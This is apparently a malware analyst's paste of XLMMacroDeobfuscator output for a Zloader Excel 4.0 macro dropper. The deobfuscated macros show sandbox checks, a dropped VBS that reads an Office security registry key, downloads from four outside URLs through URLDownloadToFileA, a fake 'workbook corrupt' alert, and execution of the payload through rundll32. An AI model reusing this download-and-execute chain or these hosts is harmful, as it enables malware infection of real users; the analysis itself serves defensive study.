dissectmalware

Zloader - new 2

Jun 21st, 2020
  1. C:\Users\user\AppData\Local\Programs\Python\Python36-32\python.exe "C:\Program Files\JetBrains\PyCharm 2020.1\plugins\python\helpers\pydev\pydevd.py" --multiproc --qt-support=auto --client 127.0.0.1 --port 64300 --file C:/Users/user/Downloads/last/XLMMacroDeobfuscator_new/XLMMacroDeobfuscator/deobfuscator.py -f C:\Users\user\Downloads\order_93711.xls\order_93711.xls
  2. pydev debugger: process 14944 is connecting
  3.  
  4. Connected to pydev debugger (build 201.6668.115)
  5.  
  6. _ _______
  7. |\ /|( \ ( )
  8. ( \ / )| ( | () () |
  9. \ (_) / | | | || || |
  10. ) _ ( | | | |(_)| |
  11. / ( ) \ | | | | | |
  12. ( / \ )| (____/\| ) ( |
  13. |/ \|(_______/|/ \|
  14. ______ _______ _______ ______ _______ _______ _______ _______ _________ _______ _______
  15. ( __ \ ( ____ \( ___ )( ___ \ ( ____ \|\ /|( ____ \( ____ \( ___ )\__ __/( ___ )( ____ )
  16. | ( \ )| ( \/| ( ) || ( ) )| ( \/| ) ( || ( \/| ( \/| ( ) | ) ( | ( ) || ( )|
  17. | | ) || (__ | | | || (__/ / | (__ | | | || (_____ | | | (___) | | | | | | || (____)|
  18. | | | || __) | | | || __ ( | __) | | | |(_____ )| | | ___ | | | | | | || __)
  19. | | ) || ( | | | || ( \ \ | ( | | | | ) || | | ( ) | | | | | | || (\ (
  20. | (__/ )| (____/\| (___) || )___) )| ) | (___) |/\____) || (____/\| ) ( | | | | (___) || ) \ \__
  21. (______/ (_______/(_______)|/ \___/ |/ (_______)\_______)(_______/|/ \| )_( (_______)|/ \__/
  22.  
  23.  
  24. XLMMacroDeobfuscator(v0.1.5) - https://github.com/DissectMalware/XLMMacroDeobfuscator
  25.  
  26. File: C:\Users\user\Downloads\order_93711.xls\order_93711.xls
  27.  
  28. Unencrypted xls file
  29.  
  30. [Loading Cells]
  31. auto_open: auto_open->'egaz0Af2DyYfLadkmB'!$FR$27455
  32. [Starting Deobfuscation]
  33. CELL:FR27455 , FullEvaluation , FORMULA("=CHAR(R[51762]C[-81])",egaz0Af2DyYfLadkmB$GO$1321:$GO$1401)
  34. CELL:FR27456 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________)
  35. CELL:CQ46304 , FullEvaluation , "=CLOSE(FALSE)"
  36. CELL:CQ46305 , FullEvaluation , "=APP.MAXIMIZE()"
  37. CELL:CQ46306 , FullEvaluation , "=IF(GET.WINDOW(7),GOTO(R33146C43),)"
  38. CELL:CQ46307 , FullEvaluation , "=IF(GET.WINDOW(20),,GOTO(R33146C43))"
  39. CELL:CQ46308 , FullEvaluation , "=IF(GET.WINDOW(23)<3,GOTO(R33146C43),)"
  40. CELL:CQ46309 , FullEvaluation , "=IF(GET.WORKSPACE(31),GOTO(R33146C43),)"
  41. CELL:CQ46310 , FullEvaluation , "=IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)"
  42. CELL:CQ46311 , FullEvaluation , "=IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)"
  43. CELL:CQ46312 , FullEvaluation , "=IF(GET.WORKSPACE(19),,GOTO(R33146C43))"
  44. CELL:CQ46313 , FullEvaluation , "=IF(GET.WORKSPACE(42),,GOTO(R33146C43))"
  45. CELL:CQ46314 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R33146C43))"
  46. CELL:CQ46315 , FullEvaluation , "=""C:\Users\Public\FsWhHWf.vbs"""
  47. CELL:CQ46316 , FullEvaluation , "=""C:\Users\Public\DC6PdmLB.txt"""
  48. CELL:CQ46317 , FullEvaluation , "=FOPEN(R33157C43,3)"
  49. CELL:CQ46318 , FullEvaluation , "=FWRITELN(R33159C43,""On Error Resume Next"")"
  50. CELL:CQ46319 , FullEvaluation , "=FWRITELN(R33159C43,""Set CAA = CreateObject(""""WScript.Shell"""")"")"
  51. CELL:CQ46320 , FullEvaluation , "=FWRITELN(R33159C43,""Set cdtQbBq = CreateObject(""""Scripting.FileSystemObject"""")"")"
  52. CELL:CQ46321 , FullEvaluation , "=FWRITELN(R33159C43,""Set zgVEMWV = cdtQbBq.CreateTextFile(""""""&R33158C43&"""""", True)"")"
  53. CELL:CQ46322 , FullEvaluation , "=FWRITELN(R33159C43,""zgVEMWV.WriteLine(CAA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")"
  54. CELL:CQ46323 , FullEvaluation , "=FWRITELN(R33159C43,""zgVEMWV.Close"")"
  55. CELL:CQ46324 , FullEvaluation , "=FCLOSE(R33159C43)"
  56. CELL:CQ46325 , FullEvaluation , "=EXEC(""explorer.exe ""&R33157C43&"""")"
  57. CELL:CQ46326 , FullEvaluation , "=WHILE(ISERROR(FILES(R33158C43)))"
  58. CELL:CQ46327 , FullEvaluation , "=WAIT(NOW()+""00:00:01"")"
  59. CELL:CQ46328 , FullEvaluation , "=NEXT()"
  60. CELL:CQ46329 , FullEvaluation , "=FILE.DELETE(R33157C43)"
  61. CELL:CQ46330 , FullEvaluation , "=FOPEN(R33158C43,2)"
  62. CELL:CQ46331 , FullEvaluation , "=FREAD(R33172C43,100)"
  63. CELL:CQ46332 , FullEvaluation , "=FCLOSE(R33172C43)"
  64. CELL:CQ46333 , FullEvaluation , "=FILE.DELETE(R33158C43)"
  65. CELL:CQ46334 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""1"",R33173C43)),GOTO(R33146C43),)"
  66. CELL:CQ46335 , FullEvaluation , "=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))"
  67. CELL:CQ46336 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________78)
  68. CELL:BK48037 , FullEvaluation , FORMULA("=FORMULA(R[-1734]C[32],R[-14892]C[-20])",egaz0Af2DyYfLadkmB$BK$48038:$BK$48069)
  69. CELL:BK48038 , FullEvaluation , FORMULA("=CLOSE(FALSE)",R[-14892]C[-20])
  70. CELL:BK48039 , FullEvaluation , FORMULA("=APP.MAXIMIZE()",R[-14892]C[-20])
  71. CELL:BK48040 , FullEvaluation , FORMULA("=IF(GET.WINDOW(7),GOTO(R33146C43),)",R[-14892]C[-20])
  72. CELL:BK48041 , FullEvaluation , FORMULA("=IF(GET.WINDOW(20),,GOTO(R33146C43))",R[-14892]C[-20])
  73. CELL:BK48042 , FullEvaluation , FORMULA("=IF(GET.WINDOW(23)<3,GOTO(R33146C43),)",R[-14892]C[-20])
  74. CELL:BK48043 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(31),GOTO(R33146C43),)",R[-14892]C[-20])
  75. CELL:BK48044 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)",R[-14892]C[-20])
  76. CELL:BK48045 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)",R[-14892]C[-20])
  77. CELL:BK48046 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(19),,GOTO(R33146C43))",R[-14892]C[-20])
  78. CELL:BK48047 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(42),,GOTO(R33146C43))",R[-14892]C[-20])
  79. CELL:BK48048 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))),,GOTO(R33146C43))",R[-14892]C[-20])
  80. CELL:BK48049 , FullEvaluation , FORMULA("=""C:\Users\Public\FsWhHWf.vbs""",R[-14892]C[-20])
  81. CELL:BK48050 , FullEvaluation , FORMULA("=""C:\Users\Public\DC6PdmLB.txt""",R[-14892]C[-20])
  82. CELL:BK48051 , FullEvaluation , FORMULA("=FOPEN(R33157C43,3)",R[-14892]C[-20])
  83. CELL:BK48052 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""On Error Resume Next"")",R[-14892]C[-20])
  84. CELL:BK48053 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set CAA = CreateObject(""""WScript.Shell"""")"")",R[-14892]C[-20])
  85. CELL:BK48054 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set cdtQbBq = CreateObject(""""Scripting.FileSystemObject"""")"")",R[-14892]C[-20])
  86. CELL:BK48055 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""Set zgVEMWV = cdtQbBq.CreateTextFile(""""""&R33158C43&"""""", True)"")",R[-14892]C[-20])
  87. CELL:BK48056 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""zgVEMWV.WriteLine(CAA.RegRead(""""HKCU\Software\Microsoft\Office\""&GET.WORKSPACE(2)&""\Excel\Security\VBAWarnings""""))"")",R[-14892]C[-20])
  88. CELL:BK48057 , FullEvaluation , FORMULA("=FWRITELN(R33159C43,""zgVEMWV.Close"")",R[-14892]C[-20])
  89. CELL:BK48058 , FullEvaluation , FORMULA("=FCLOSE(R33159C43)",R[-14892]C[-20])
  90. CELL:BK48059 , FullEvaluation , FORMULA("=EXEC(""explorer.exe ""&R33157C43&"""")",R[-14892]C[-20])
  91. CELL:BK48060 , FullEvaluation , FORMULA("=WHILE(ISERROR(FILES(R33158C43)))",R[-14892]C[-20])
  92. CELL:BK48061 , FullEvaluation , FORMULA("=WAIT(NOW()+""00:00:01"")",R[-14892]C[-20])
  93. CELL:BK48062 , FullEvaluation , FORMULA("=NEXT()",R[-14892]C[-20])
  94. CELL:BK48063 , FullEvaluation , FORMULA("=FILE.DELETE(R33157C43)",R[-14892]C[-20])
  95. CELL:BK48064 , FullEvaluation , FORMULA("=FOPEN(R33158C43,2)",R[-14892]C[-20])
  96. CELL:BK48065 , FullEvaluation , FORMULA("=FREAD(R33172C43,100)",R[-14892]C[-20])
  97. CELL:BK48066 , FullEvaluation , FORMULA("=FCLOSE(R33172C43)",R[-14892]C[-20])
  98. CELL:BK48067 , FullEvaluation , FORMULA("=FILE.DELETE(R33158C43)",R[-14892]C[-20])
  99. CELL:BK48068 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""1"",R33173C43)),GOTO(R33146C43),)",R[-14892]C[-20])
  100. CELL:BK48069 , FullEvaluation , FORMULA("=IF(ISNUMBER(SEARCH(""32"",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))",R[-14892]C[-20])
  101. CELL:BK48070 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________79)
  102. CELL:AQ33147 , PartialEvaluation , APP.MAXIMIZE()
  103. CELL:AQ33148 , FullEvaluation , IF(GET.WINDOW(7),GOTO(R33146C43),)
  104. CELL:AQ33149 , FullEvaluation , IF(GET.WINDOW(20),,GOTO(R33146C43))
  105. CELL:AQ33150 , FullEvaluation , IF(GET.WINDOW(23)<3,GOTO(R33146C43),)
  106. CELL:AQ33151 , FullEvaluation , IF(GET.WORKSPACE(31),GOTO(R33146C43),)
  107. CELL:AQ33152 , FullEvaluation , IF(GET.WORKSPACE(13)<770,GOTO(R33146C43),)
  108. CELL:AQ33153 , FullEvaluation , IF(GET.WORKSPACE(14)<390,GOTO(R33146C43),)
  109. CELL:AQ33154 , FullEvaluation , IF(GET.WORKSPACE(19),,GOTO(R33146C43))
  110. CELL:AQ33155 , FullEvaluation , IF(GET.WORKSPACE(42),,GOTO(R33146C43))
  111. CELL:AQ33156 , FullBranching , IF(ISNUMBER(SEARCH("Windows",GET.WORKSPACE(1))),,GOTO(R33146C43))
  112. CELL:AQ33156 , FullEvaluation , [TRUE]
  113. CELL:AQ33157 , FullEvaluation , "C:\Users\Public\FsWhHWf.vbs"
  114. CELL:AQ33158 , FullEvaluation , "C:\Users\Public\DC6PdmLB.txt"
  115. CELL:AQ33159 , PartialEvaluation , FOPEN("C:\Users\Public\FsWhHWf.vbs",3)
  116. CELL:AQ33160 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","On Error Resume Next")
  117. CELL:AQ33161 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set CAA = CreateObject(""WScript.Shell"")")
  118. CELL:AQ33162 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set cdtQbBq = CreateObject(""Scripting.FileSystemObject"")")
  119. CELL:AQ33163 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","Set zgVEMWV = cdtQbBq.CreateTextFile(""C:\Users\Public\DC6PdmLB.txt"", True)")
  120. CELL:AQ33164 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","zgVEMWV.WriteLine(CAA.RegRead(""HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security\VBAWarnings""))")
  121. CELL:AQ33165 , PartialEvaluation , FWRITELN("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)","zgVEMWV.Close")
  122. CELL:AQ33166 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\FsWhHWf.vbs"",3)")
  123. CELL:AQ33167 , PartialEvaluation , EXEC("explorer.exe C:\Users\Public\FsWhHWf.vbs")
  124. CELL:AQ33168 , PartialEvaluation , WHILE(ISERROR(FILES(R33158C43)))
  125. CELL:AQ33171 , PartialEvaluation , FILE.DELETE("C:\Users\Public\FsWhHWf.vbs")
  126. CELL:AQ33172 , PartialEvaluation , FOPEN("C:\Users\Public\DC6PdmLB.txt",2)
  127. CELL:AQ33173 , PartialEvaluation , FREAD("FOPEN(""C:\Users\Public\DC6PdmLB.txt"",2)",100)
  128. CELL:AQ33174 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\DC6PdmLB.txt"",2)")
  129. CELL:AQ33175 , PartialEvaluation , FILE.DELETE("C:\Users\Public\DC6PdmLB.txt")
  130. CELL:AQ33176 , FullBranching , IF(ISNUMBER(SEARCH("1",R33173C43)),GOTO(R33146C43),)
  131. CELL:AQ33176 , FullEvaluation , [TRUE] GOTO(R33146C43)
  132. CELL:AQ33146 , End , CLOSE(FALSE)
  133. CELL:AQ33176 , FullEvaluation , [FALSE]
  134. CELL:AQ33177 , FullBranching , IF(ISNUMBER(SEARCH("32",GET.WORKSPACE(1))),GOTO(R13419C196),GOTO(R26995C97))
  135. CELL:AQ33177 , FullEvaluation , [TRUE] GOTO(R13419C196)
  136. CELL:GN13419 , FullEvaluation , "=""C:\Users\Public\lxlGZ4A.html"""
  137. CELL:GN13420 , FullEvaluation , "=""https://wireborg.com/wp-keys.php"""
  138. CELL:GN13421 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38563C99,R38562C99,0,0)"
  139. CELL:GN13422 , FullEvaluation , "=FILES(R38562C99)"
  140. CELL:GN13423 , FullEvaluation , "=IF(ISERROR(R38565C99),GOTO(R38572C99),)"
  141. CELL:GN13424 , FullEvaluation , "=FOPEN(R38562C99)"
  142. CELL:GN13425 , FullEvaluation , "=FSIZE(R38567C99)"
  143. CELL:GN13426 , FullEvaluation , "=FCLOSE(R38567C99)"
  144. CELL:GN13427 , FullEvaluation , "=IF(R38568C99<40000,,GOTO(R38589C99))"
  145. CELL:GN13428 , FullEvaluation , "=""http://zmedia.shwetech.com/wp-keys.php"""
  146. CELL:GN13429 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38571C99,R38562C99,0,0)"
  147. CELL:GN13430 , FullEvaluation , "=FILES(R38562C99)"
  148. CELL:GN13431 , FullEvaluation , "=IF(ISERROR(R38573C99),GOTO(R38580C99),)"
  149. CELL:GN13432 , FullEvaluation , "=FOPEN(R38562C99)"
  150. CELL:GN13433 , FullEvaluation , "=FSIZE(R38575C99)"
  151. CELL:GN13434 , FullEvaluation , "=FCLOSE(R38575C99)"
  152. CELL:GN13435 , FullEvaluation , "=IF(R38576C99<40000,,GOTO(R38589C99))"
  153. CELL:GN13436 , FullEvaluation , "=""https://datalibacbi.ml/wp-keys.php"""
  154. CELL:GN13437 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38579C99,R38562C99,0,0)"
  155. CELL:GN13438 , FullEvaluation , "=FILES(R38562C99)"
  156. CELL:GN13439 , FullEvaluation , "=IF(ISERROR(R38581C99),GOTO(R38588C99),)"
  157. CELL:GN13440 , FullEvaluation , "=FOPEN(R38562C99)"
  158. CELL:GN13441 , FullEvaluation , "=FSIZE(R38583C99)"
  159. CELL:GN13442 , FullEvaluation , "=FCLOSE(R38583C99)"
  160. CELL:GN13443 , FullEvaluation , "=IF(R38584C99<40000,,GOTO(R38589C99))"
  161. CELL:GN13444 , FullEvaluation , "=""https://procacardenla.ga/wp-keys.php"""
  162. CELL:GN13445 , FullEvaluation , "=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38587C99,R38562C99,0,0)"
  163. CELL:GN13446 , FullEvaluation , "=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."""
  164. CELL:GN13447 , FullEvaluation , "=ALERT(R38589C99)"
  165. CELL:GN13448 , FullEvaluation , "=""C:\Windows\system32\rundll32.exe"""
  166. CELL:GN13449 , FullEvaluation , "=R38562C99&"",DllRegisterServer"""
  167. CELL:GN13450 , FullEvaluation , "=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38591C99,R38592C99,0,5)"
  168. CELL:GN13451 , FullEvaluation , "=GOTO(R33146C43)"
  169. CELL:GN13452 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________80)
  170. CELL:DN28840 , FullEvaluation , FORMULA("=FORMULA(R[-15422]C[78],R[9721]C[-19])",egaz0Af2DyYfLadkmB$DN$28841:$DN$28873)
  171. CELL:DN28841 , FullEvaluation , FORMULA("=""C:\Users\Public\lxlGZ4A.html""",R[9721]C[-19])
  172. CELL:DN28842 , FullEvaluation , FORMULA("=""https://wireborg.com/wp-keys.php""",R[9721]C[-19])
  173. CELL:DN28843 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38563C99,R38562C99,0,0)",R[9721]C[-19])
  174. CELL:DN28844 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
  175. CELL:DN28845 , FullEvaluation , FORMULA("=IF(ISERROR(R38565C99),GOTO(R38572C99),)",R[9721]C[-19])
  176. CELL:DN28846 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
  177. CELL:DN28847 , FullEvaluation , FORMULA("=FSIZE(R38567C99)",R[9721]C[-19])
  178. CELL:DN28848 , FullEvaluation , FORMULA("=FCLOSE(R38567C99)",R[9721]C[-19])
  179. CELL:DN28849 , FullEvaluation , FORMULA("=IF(R38568C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
  180. CELL:DN28850 , FullEvaluation , FORMULA("=""http://zmedia.shwetech.com/wp-keys.php""",R[9721]C[-19])
  181. CELL:DN28851 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38571C99,R38562C99,0,0)",R[9721]C[-19])
  182. CELL:DN28852 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
  183. CELL:DN28853 , FullEvaluation , FORMULA("=IF(ISERROR(R38573C99),GOTO(R38580C99),)",R[9721]C[-19])
  184. CELL:DN28854 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
  185. CELL:DN28855 , FullEvaluation , FORMULA("=FSIZE(R38575C99)",R[9721]C[-19])
  186. CELL:DN28856 , FullEvaluation , FORMULA("=FCLOSE(R38575C99)",R[9721]C[-19])
  187. CELL:DN28857 , FullEvaluation , FORMULA("=IF(R38576C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
  188. CELL:DN28858 , FullEvaluation , FORMULA("=""https://datalibacbi.ml/wp-keys.php""",R[9721]C[-19])
  189. CELL:DN28859 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38579C99,R38562C99,0,0)",R[9721]C[-19])
  190. CELL:DN28860 , FullEvaluation , FORMULA("=FILES(R38562C99)",R[9721]C[-19])
  191. CELL:DN28861 , FullEvaluation , FORMULA("=IF(ISERROR(R38581C99),GOTO(R38588C99),)",R[9721]C[-19])
  192. CELL:DN28862 , FullEvaluation , FORMULA("=FOPEN(R38562C99)",R[9721]C[-19])
  193. CELL:DN28863 , FullEvaluation , FORMULA("=FSIZE(R38583C99)",R[9721]C[-19])
  194. CELL:DN28864 , FullEvaluation , FORMULA("=FCLOSE(R38583C99)",R[9721]C[-19])
  195. CELL:DN28865 , FullEvaluation , FORMULA("=IF(R38584C99<40000,,GOTO(R38589C99))",R[9721]C[-19])
  196. CELL:DN28866 , FullEvaluation , FORMULA("=""https://procacardenla.ga/wp-keys.php""",R[9721]C[-19])
  197. CELL:DN28867 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,R38587C99,R38562C99,0,0)",R[9721]C[-19])
  198. CELL:DN28868 , FullEvaluation , FORMULA("=""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.""",R[9721]C[-19])
  199. CELL:DN28869 , FullEvaluation , FORMULA("=ALERT(R38589C99)",R[9721]C[-19])
  200. CELL:DN28870 , FullEvaluation , FORMULA("=""C:\Windows\system32\rundll32.exe""",R[9721]C[-19])
  201. CELL:DN28871 , FullEvaluation , FORMULA("=R38562C99&"",DllRegisterServer""",R[9721]C[-19])
  202. CELL:DN28872 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",R38591C99,R38592C99,0,5)",R[9721]C[-19])
  203. CELL:DN28873 , FullEvaluation , FORMULA("=GOTO(R33146C43)",R[9721]C[-19])
  204. CELL:DN28874 , FullEvaluation , GOTO(egaz0Af2DyYfLadkmB!___________81)
  205. CELL:CU38562 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html"
  206. CELL:CU38563 , FullEvaluation , "https://wireborg.com/wp-keys.php"
  207. CELL:CU38564 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://wireborg.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  208. CELL:CU38565 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  209. CELL:CU38566 , FullBranching , IF(ISERROR(R38565C99),GOTO(R38572C99),)
  210. CELL:CU38566 , FullEvaluation , [TRUE] GOTO(R38572C99)
  211. CELL:CU38572 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  212. CELL:CU38573 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  213. CELL:CU38574 , FullBranching , IF(ISERROR(R38573C99),GOTO(R38580C99),)
  214. CELL:CU38574 , FullEvaluation , [TRUE] GOTO(R38580C99)
  215. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  216. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  217. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  218. CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
  219. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  220. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  221. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  222. CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  223. CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
  224. CELL:CU38593 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\lxlGZ4A.html,DllRegisterServer",0,5)
  225. CELL:CU38594 , FullEvaluation , GOTO(R33146C43)
  226. CELL:AQ33146 , End , CLOSE(FALSE)
  227. CELL:CU38582 , FullEvaluation , [FALSE]
  228. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  229. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  230. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  231. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  232. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  233. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  234. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  235. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  236. CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  237. CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
  238. CELL:CU38593 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\rundll32.exe","C:\Users\Public\lxlGZ4A.html,DllRegisterServer",0,5)
  239. CELL:CU38594 , FullEvaluation , GOTO(R33146C43)
  240. CELL:AQ33146 , End , CLOSE(FALSE)
  241. CELL:CU38574 , FullEvaluation , [FALSE]
  242. CELL:CU38575 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  243. CELL:CU38576 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  244. CELL:CU38577 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  245. CELL:CU38578 , FullEvaluation , IF(R38576C99<40000,,GOTO(R38589C99))
  246. CELL:CU38579 , FullEvaluation , "https://datalibacbi.ml/wp-keys.php"
  247. CELL:CU38580 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://datalibacbi.ml/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  248. CELL:CU38581 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  249. CELL:CU38582 , FullBranching , IF(ISERROR(R38581C99),GOTO(R38588C99),)
  250. CELL:CU38582 , FullEvaluation , [TRUE] GOTO(R38588C99)
  251. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  252. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  253. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  254. CELL:CU38591 , FullEvaluation , "C:\Windows\system32\rundll32.exe"
  255. CELL:CU38592 , FullEvaluation , "C:\Users\Public\lxlGZ4A.html,DllRegisterServer"
  256. CELL:CU38582 , FullEvaluation , [FALSE]
  257. CELL:CU38583 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  258. CELL:CU38584 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  259. CELL:CU38585 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  260. CELL:CU38586 , FullEvaluation , IF(R38584C99<40000,,GOTO(R38589C99))
  261. CELL:CU38587 , FullEvaluation , "https://procacardenla.ga/wp-keys.php"
  262. CELL:CU38588 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"https://procacardenla.ga/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  263. CELL:CU38589 , FullEvaluation , "The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."
  264. CELL:CU38590 , PartialEvaluation , ALERT("The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.")
  265. CELL:CU38566 , FullEvaluation , [FALSE]
  266. CELL:CU38567 , PartialEvaluation , FOPEN("C:\Users\Public\lxlGZ4A.html")
  267. CELL:CU38568 , PartialEvaluation , FSIZE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  268. CELL:CU38569 , PartialEvaluation , FCLOSE("FOPEN(""C:\Users\Public\lxlGZ4A.html"")")
  269. CELL:CU38570 , FullEvaluation , IF(R38568C99<40000,,GOTO(R38589C99))
  270. CELL:CU38571 , FullEvaluation , "http://zmedia.shwetech.com/wp-keys.php"
  271. CELL:CU38572 , FullEvaluation , CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,"http://zmedia.shwetech.com/wp-keys.php","C:\Users\Public\lxlGZ4A.html",0,0)
  272. CELL:CU38573 , PartialEvaluation , FILES("C:\Users\Public\lxlGZ4A.html")
  273. CELL:CU38574 , FullBranching , IF(ISERROR(R38573C99),GOTO(R38580C99),)
  274. CELL:CU38574 , FullEvaluation , [TRUE] GOTO(R38580C99)
